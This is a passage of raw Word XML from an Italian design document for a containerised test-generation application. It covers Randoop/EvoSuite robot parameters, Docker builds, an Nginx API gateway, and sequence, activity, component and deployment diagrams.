        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>timelimit va a impostare il tempo massimo per ciascuna iterazione del robot, tale valore è stato decrementato (timelimit = 2) in modo tale che il robot non raggiunga subito il 100% della coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4922E" w14:textId="37973909" w:rsidR="00621119" w:rsidRPr="00715086" w:rsidRDefault="00621119" w:rsidP="003559BC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">max_iter invece </w:t>
      </w:r>
      <w:r w:rsidR="003559BC" w:rsidRPr="00715086">
        <w:t>setta il massimo numero di iterazioni del robot per la generazione di tutti i livelli, questo parametro è stato aumentato (max_iter = 7) per dare al robot più tentativi per raggiungere una coverage elevata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299636D3" w14:textId="796B2F01" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00061638" w:rsidP="00B87D3E">
      <w:r w:rsidRPr="00715086">
        <w:t>Inoltre per ognuno dei task è stato fatto in modo che i corrispondenti DockerFile non solo permettano l’esecuzione del container ma anche la build. In questo modo si facilita la manutenibilità di ogni task dal momento che basterà semplicemente rilanciare il comando docker compose per rendere visibili le modifiche.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6899B1A7" w14:textId="64A8F61C" w:rsidR="007A0D63" w:rsidRPr="00715086" w:rsidRDefault="007A0D63" w:rsidP="007A0D63">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc148195737"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.1.5 Nginx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="02EF866B" w14:textId="77777777" w:rsidR="007A0D63" w:rsidRPr="00715086" w:rsidRDefault="007A0D63" w:rsidP="007A0D63">
      <w:r w:rsidRPr="00715086">
        <w:t>Nginx è un server web open-source ampiamente utilizzato per funzioni come reverse proxy, load balancing e API gateway. Ciò può migliorare l'affidabilità e la scalabilità delle applicazioni basate su servizi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB70094" w14:textId="29B14F5E" w:rsidR="00EB28B4" w:rsidRPr="00715086" w:rsidRDefault="00EB28B4" w:rsidP="007A0D63">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123E9C3F" wp14:editId="598FB6F8">
            <wp:extent cx="4114800" cy="1541868"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1237392641" name="Immagine 1" descr="Immagine che contiene testo, clipart, Elementi grafici,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92641" name="Immagine 1" descr="Immagine che contiene testo, clipart, Elementi grafici, cartone anima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123442" cy="1545106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DBD2A" w14:textId="77777777" w:rsidR="007A0D63" w:rsidRPr="00715086" w:rsidRDefault="007A0D63">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Reverse proxy: un tipo di proxy che recupera contenuti per conto di un client da uno o più server. Questi contenuti sono poi trasferiti al client come se provenissero dallo stesso proxy, che quindi appare al client come un server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28845EA7" w14:textId="77777777" w:rsidR="007A0D63" w:rsidRPr="00715086" w:rsidRDefault="007A0D63">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Load balancing: Nginx può distribuire le richieste tra più istanze di servizi backend per garantire la scalabilità e la ridondanza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB7C28" w14:textId="325CADCD" w:rsidR="007A0D63" w:rsidRPr="00715086" w:rsidRDefault="007A0D63">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:t>Cache: Può essere utilizzato per memorizzare nella cache le risposte dei server per ridurre il carico sui servizi backend e migliorare le prestazioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411FDD32" w14:textId="4AD6B338" w:rsidR="007A0D63" w:rsidRPr="00715086" w:rsidRDefault="007A0D63" w:rsidP="007A0D63">
      <w:r w:rsidRPr="00715086">
        <w:t>Nel nostro caso Nginx è configurato come API gateway: ciò permette di raggiungere sia il frontend che il backend allo stesso indirizzo (http://localhost), separando le richieste del backend dal frontend tramite il path "/api"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE510E" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="411D7EB3" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="27E744A1" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="00279183" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="010DA609" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="26B23C1F" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="485EFC39" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="05E1695C" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="0BD98692" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="77F34095" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="6E72445F" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="7D09004C" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="4BF9850D" w14:textId="77777777" w:rsidR="00FD658B" w:rsidRPr="00715086" w:rsidRDefault="00FD658B" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="036DDECF" w14:textId="77777777" w:rsidR="00112F92" w:rsidRPr="00715086" w:rsidRDefault="00112F92" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="4BCC3A6E" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="00B87D3E"/>
    <w:p w14:paraId="658E26DB" w14:textId="61382F4B" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc148195738"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.2 Diagrammi di Sequenza</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="66DFB1BD" w14:textId="035C60A3" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B26C6F" w:rsidP="00B87D3E">
      <w:r w:rsidRPr="00715086">
        <w:t>Si vogliono descrivere i diagrammi di sequenza al livello dell’interazione tra Task, rimandiamo quindi alle documentazioni dei singoli Task per diagrammi più dettagliati sulle diverse funzionalità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A598D6" w14:textId="1DF818FC" w:rsidR="00B26C6F" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc148195739"/>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">3.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00112F92" w:rsidRPr="00715086">
        <w:t>Play</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="1BABF94F" w14:textId="39CAD0B6" w:rsidR="00BC5704" w:rsidRPr="00715086" w:rsidRDefault="00480DB3" w:rsidP="00BC5704">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34B5B56D" wp14:editId="7B74C424">
            <wp:extent cx="5809992" cy="8091672"/>
            <wp:effectExtent l="0" t="0" r="635" b="5080"/>
            <wp:docPr id="1602405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0523" name="Immagine 1602405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3730" cy="8096878"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A11842" w14:textId="0D5CA5D2" w:rsidR="00112F92" w:rsidRPr="00715086" w:rsidRDefault="00112F92" w:rsidP="00112F92">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc148195740"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.2.</w:t>
      </w:r>
      <w:r w:rsidR="002A070B" w:rsidRPr="00715086">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione Test Randoop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="561BE7C6" w14:textId="00996367" w:rsidR="000B2170" w:rsidRPr="00715086" w:rsidRDefault="00112F92" w:rsidP="00E27FF1">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="178706CA" wp14:editId="1BF0AEF6">
            <wp:extent cx="4494482" cy="3604260"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1860733122" name="Immagine 5"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3122" name="Immagine 5" descr="Immagine che contiene testo, diagramma, Parallelo, schermat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1316" cy="3609740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDDEBC" w14:textId="11762D98" w:rsidR="00CC1EF9" w:rsidRPr="00715086" w:rsidRDefault="00CC1EF9" w:rsidP="00E27FF1">
      <w:r w:rsidRPr="00715086">
        <w:t>Questo caso d’uso viene avviato non appena è lanciato il container Randoop, quindi non appena viene avviata l’applicazione. Si occupa della generazione dei test e del calcolo delle coverage per tutte le classi presenti nel repository e non ancora testate (ovvero quelle classi per le quali non esiste la directory RandoopTest). Il container si spegne non appena termina la generazione dei test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53079504" w14:textId="77777777" w:rsidR="000B2170" w:rsidRPr="00715086" w:rsidRDefault="000B2170" w:rsidP="00E27FF1"/>
    <w:p w14:paraId="3CB45716" w14:textId="05DBCBC0" w:rsidR="00112F92" w:rsidRPr="00715086" w:rsidRDefault="00112F92" w:rsidP="00112F92">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc148195741"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.2.</w:t>
      </w:r>
      <w:r w:rsidR="002A070B" w:rsidRPr="00715086">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione Test EvoSuite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="46BF3AA7" w14:textId="7BCC4961" w:rsidR="000B2170" w:rsidRPr="00715086" w:rsidRDefault="00112F92" w:rsidP="00E27FF1">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02294F3F" wp14:editId="762F9EEC">
            <wp:extent cx="4970880" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1828627818" name="Immagine 6"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7818" name="Immagine 6" descr="Immagine che contiene testo, schermata, diagramma, line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7608" cy="2975822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52596142" w14:textId="01292181" w:rsidR="00CC1EF9" w:rsidRPr="00715086" w:rsidRDefault="00CC1EF9" w:rsidP="00E27FF1">
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">Questo caso d’uso viene avviato quando l’utente lancia il comando di generazione dei test EvoSuite (robot_generazione.sh), a differenza di Randoop quindi i test non vengono generati automaticamente all’avvio dell’applicazione ma deve essere l’admin a dare il via, inoltre sarà necessario indicare tra i parametri la classe per la quale si intende avviare la generazione. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A35700" w14:textId="2A3FFB6A" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc148195742"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Diagramma di Attività</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="03D7E69D" w14:textId="0AD2C384" w:rsidR="005C083A" w:rsidRPr="00715086" w:rsidRDefault="005C083A" w:rsidP="005C083A">
      <w:r w:rsidRPr="00715086">
        <w:t>Vengono di seguito mostrati i diagrammi di attività delle funzionalità introdotte, per comprendere meglio il flusso del processo e l’ordine delle azioni.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B81D15E" w14:textId="57B6343F" w:rsidR="00663FE7" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00CC1EF9">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc148195743"/>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">3.3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00CC1EF9" w:rsidRPr="00715086">
        <w:t>Play</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="274784C8" w14:textId="5EE11608" w:rsidR="00663FE7" w:rsidRPr="00715086" w:rsidRDefault="00603D4B" w:rsidP="00B87D3E">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C170E43" wp14:editId="766FCD27">
            <wp:extent cx="4543956" cy="8176260"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1546353719" name="Immagine 8"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53719" name="Immagine 8" descr="Immagine che contiene testo, schermata, diagramma,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545304" cy="8178686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1300A" w14:textId="0C5366C7" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc148195744"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.3.</w:t>
      </w:r>
      <w:r w:rsidR="00CC1EF9" w:rsidRPr="00715086">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione </w:t>
      </w:r>
      <w:r w:rsidR="00CC1EF9" w:rsidRPr="00715086">
        <w:t>Test Randoop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="6993115A" w14:textId="374FC4D4" w:rsidR="00663FE7" w:rsidRPr="00715086" w:rsidRDefault="00603D4B" w:rsidP="00663FE7">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A3ED76E" wp14:editId="61027971">
            <wp:extent cx="2499360" cy="4056054"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="435815019" name="Immagine 9"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15019" name="Immagine 9" descr="Immagine che contiene testo, schermata, Carattere, design&#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510137" cy="4073543"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B4C8B" w14:textId="503F53B8" w:rsidR="00CC1EF9" w:rsidRPr="00715086" w:rsidRDefault="00CC1EF9" w:rsidP="00CC1EF9">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc148195745"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.3.3 Generazione Test EvoSuite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="31FF9121" w14:textId="30600D16" w:rsidR="00663FE7" w:rsidRPr="00715086" w:rsidRDefault="00603D4B" w:rsidP="00663FE7">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FE2D83C" wp14:editId="279ABEC2">
            <wp:extent cx="1879545" cy="3977640"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
            <wp:docPr id="1003921328" name="Immagine 10"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21328" name="Immagine 10" descr="Immagine che contiene testo, schermata, design&#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887714" cy="3994927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06F7B9" w14:textId="2919A406" w:rsidR="00163A33" w:rsidRPr="00715086" w:rsidRDefault="00801942" w:rsidP="00163A33">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc148195746"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="247F5BE6" wp14:editId="7692BB7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-476250</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>226695</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7025640" cy="1439545"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="999164773" name="Immagine 2"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64773" name="Immagine 2" descr="Immagine che contiene schermata, linea, diagramma, Diagramm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25640" cy="1439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00163A33" w:rsidRPr="00715086">
        <w:t>3.3.</w:t>
      </w:r>
      <w:r w:rsidR="00CC1EF9" w:rsidRPr="00715086">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00163A33" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Flusso di attività completo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="6A3FE8F0" w14:textId="77777777" w:rsidR="006A6148" w:rsidRPr="00715086" w:rsidRDefault="006A6148" w:rsidP="00663FE7"/>
    <w:p w14:paraId="4A0A0BA4" w14:textId="77777777" w:rsidR="00603D4B" w:rsidRPr="00715086" w:rsidRDefault="00603D4B" w:rsidP="00663FE7"/>
    <w:p w14:paraId="27CEF251" w14:textId="1A98779D" w:rsidR="0055772E" w:rsidRPr="00715086" w:rsidRDefault="006A6148" w:rsidP="006A6148">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc148195747"/>
      <w:r w:rsidRPr="00715086">
        <w:t>3.4 Component Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="726875E7" w14:textId="606EAF59" w:rsidR="006A6148" w:rsidRPr="00715086" w:rsidRDefault="006A6148" w:rsidP="006A6148">
      <w:r w:rsidRPr="00715086">
        <w:t>Il diagramma dei componenti e connettori evidenzia quelle che sono le entità del sistema che esistono a tempo di esecuzione e la loro interazione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70755E" w14:textId="57E508BB" w:rsidR="006A6148" w:rsidRPr="00715086" w:rsidRDefault="00B2582A" w:rsidP="006A6148">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="088CCC32" wp14:editId="480A6B7B">
            <wp:extent cx="6120130" cy="3159125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="105363147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31470" name="Immagine 1" descr="Immagine che contiene testo, schermata, diagramma, line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159125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467B198" w14:textId="0914D423" w:rsidR="00B2582A" w:rsidRPr="00715086" w:rsidRDefault="00B2582A" w:rsidP="006A6148">
      <w:r w:rsidRPr="00715086">
        <w:t>Nel diagramma sono stati indicati in blu i componenti che sono rimasti invariati nel processo di integrazione, in verde i componenti che erano già presenti prima dell’integrazione ma sono stati modificati, mentre in viola i componenti che sono stati aggiunti, infine in gridio è stato rappresentato il repository condiviso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA74F2D" w14:textId="2CDADC82" w:rsidR="006A6148" w:rsidRPr="00715086" w:rsidRDefault="00454A3B" w:rsidP="00105F55">
      <w:r w:rsidRPr="00715086">
        <w:t>Il componente API Gateway è stato realizzato utilizzando Ngi</w:t>
      </w:r>
      <w:r w:rsidR="000D52F2" w:rsidRPr="00715086">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">x, permette di realizzare il reverse proxy, quindi si occupa di effettuare il routing delle richieste al frontend e richieste API. In particolare tutte </w:t>
      </w:r>
      <w:r w:rsidR="00105F55" w:rsidRPr="00715086">
        <w:t>le richieste che contengono “/api/” nell’URL vengono indirizzate al backend.</w:t>
      </w:r>
      <w:r w:rsidR="00105F55" w:rsidRPr="00715086">
        <w:br/>
        <w:t>Il backend a sua volta si interfaccia con il componente “Compiler” del Task 7 ed utilizza il repository condiviso per recuperare i valori di coverage. Sul repository agiscono anche i componenti di generazione dei Test Randoop ed EvoSuite che recuperano la classe sotto test e salvano le classi di test e le rispettive coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013A58A6" w14:textId="09E14B76" w:rsidR="008F31BC" w:rsidRPr="00715086" w:rsidRDefault="008F31BC" w:rsidP="006A6148">
      <w:r w:rsidRPr="00715086">
        <w:t>Per ognuno dei componenti una descrizione più dettagliata si trova nelle documentazioni dei rispettivi Task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FB874" w14:textId="77777777" w:rsidR="006A6148" w:rsidRPr="00715086" w:rsidRDefault="006A6148" w:rsidP="006A6148"/>
    <w:p w14:paraId="4B9B3F15" w14:textId="77777777" w:rsidR="006A6148" w:rsidRPr="00715086" w:rsidRDefault="006A6148" w:rsidP="006A6148"/>
    <w:p w14:paraId="529FA436" w14:textId="157E1159" w:rsidR="00B87D3E" w:rsidRPr="00715086" w:rsidRDefault="00B87D3E" w:rsidP="00B87D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc148195748"/>
      <w:r w:rsidRPr="00715086">
        <w:lastRenderedPageBreak/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="006A6148" w:rsidRPr="00715086">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Deployment Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="7C228BFA" w14:textId="08BE271D" w:rsidR="00603D4B" w:rsidRPr="00715086" w:rsidRDefault="00603D4B" w:rsidP="00603D4B">
      <w:r w:rsidRPr="00715086">
        <w:t>Il diagramma di deployment ci permette di evidenziare la disposizione fisica dei componenti del sistema e la loro interazione. L’applicazione si trova al di sopra di un server cui il Client si può collegare tramite Browser. I vari task che costituiscono l’applicazione sono organizzati in container che eseguono in Docker. Oltre ai container abbiamo un Volume (repository) che è condiviso tra i Task 6,8,9 e serve per depositare/recuperare i dati di coverage dei robot per ciascuna classe, abbiamo anche una rete my-network che è condivisa tra i vari container. In più è presente un API Gateway che funge da reverse proxy, fa si che l’intera applicazione sia esposta sul porto 80 ed è l’unico container esposto verso l’esterno.</w:t>
      </w:r>
      <w:r w:rsidR="003C7713" w:rsidRPr="00715086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t>Il suo compito è quello di gestire le richieste del client: ciascuna richiesta che inizia con “/api” viene indirizzata al backend del T6</w:t>
      </w:r>
      <w:r w:rsidR="00FB6807" w:rsidRPr="00715086">
        <w:t>, mentre le altre al frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E455A" w14:textId="4940BB62" w:rsidR="001B72C6" w:rsidRPr="00715086" w:rsidRDefault="00603D4B" w:rsidP="0055772E">
      <w:r w:rsidRPr="00715086">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536188ED" wp14:editId="551D4904">
            <wp:extent cx="6348730" cy="4588634"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="156041162"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1162" name="Immagine 11" descr="Immagine che contiene testo, schermata, diagramma, Rettangol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51930" cy="4590947"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965D038" w14:textId="77777777" w:rsidR="0055772E" w:rsidRPr="00715086" w:rsidRDefault="0055772E" w:rsidP="0055772E"/>
    <w:p w14:paraId="2271AA62" w14:textId="77777777" w:rsidR="00236C0D" w:rsidRPr="00715086" w:rsidRDefault="00236C0D" w:rsidP="0055772E"/>
    <w:p w14:paraId="5585A79C" w14:textId="77777777" w:rsidR="00236C0D" w:rsidRPr="00715086" w:rsidRDefault="00236C0D" w:rsidP="0055772E"/>
    <w:p w14:paraId="463FC04F" w14:textId="77777777" w:rsidR="00236C0D" w:rsidRPr="00715086" w:rsidRDefault="00236C0D" w:rsidP="0055772E"/>
